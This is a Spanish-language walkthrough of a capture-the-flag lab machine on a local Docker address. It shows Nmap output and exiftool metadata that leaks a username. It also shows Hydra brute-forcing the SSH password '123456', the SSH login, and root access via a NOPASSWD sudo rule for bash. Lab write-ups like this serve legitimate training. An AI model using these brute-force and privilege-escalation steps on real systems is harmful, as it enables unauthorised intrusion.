Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 12:27 EST
Nmap scan report for 172.17.0.2
Host is up (0.000027s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 3d:fd:d7:c8:17:97:f5:12:b1:f5:11:7d:af:88:06:fe (ECDSA)
|_ 256 43:b3:ba:a9:32:c9:01:43:ee:62:d0:11:12:1d:5d:17 (ED25519)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds
Si entramos en la pagina vemos simplemente una imagen de un huevo kinder, pero si realizamos fuzzing no encontraremos nada, si intentamos fuerza bruta con hydra tampoco veremos nada, por lo que vamos a ver si contiene metadatos importantes dicha imagen, por lo que vamos a descargarnos la imagen y utilizar una herramienta para sacar los metadatos de la imagen.
exiftool
wget http://<IP>/imagen.jpeg
exiftool imagen.jpeg
Info:
ExifTool Version Number : 13.00
File Name : imagen.jpeg
Directory : .
File Size : 19 kB
File Modification Date/Time : 2024:05:28 12:10:18-04:00
File Access Date/Time : 2025:02:06 12:31:55-05:00
File Inode Change Date/Time : 2025:02:06 12:31:55-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
XMP Toolkit : Image::ExifTool 12.76
Description : ---------- User: borazuwarah ----------
Title : ---------- Password: ----------
Image Width : 455
Image Height : 455
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 455x455
Megapixels : 0.207
Por lo que vemos tenemos un usuario, por lo que probaremos a realizar fuerza bruta con dicho usuario.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-06 12:34:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: borazuwarah password: 123456
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 21 final worker threads did not complete until end.
[ERROR] 21 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-06 12:34:06
Por lo que vemos obtendremos las credenciales del usuario borazuwarah por lo que nos conectaremos por ssh de la siguiente forma:
SSH
ssh borazuwarah@<IP>
Metemos como contraseña 123456 y veremos que estamos dentro.
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for borazuwarah on 7b08259878b6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User borazuwarah may run the following commands on 7b08259878b6:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/bash
Veremos que podremos ejecutar el binario bash como el usuario root, por lo que haremos lo siguiente:
sudo bash
Info:
root@fd6a0da128a8:/home/borazuwarah# whoami
root
Y con esto ya seremos root, por lo que habremos terminado la maquina.
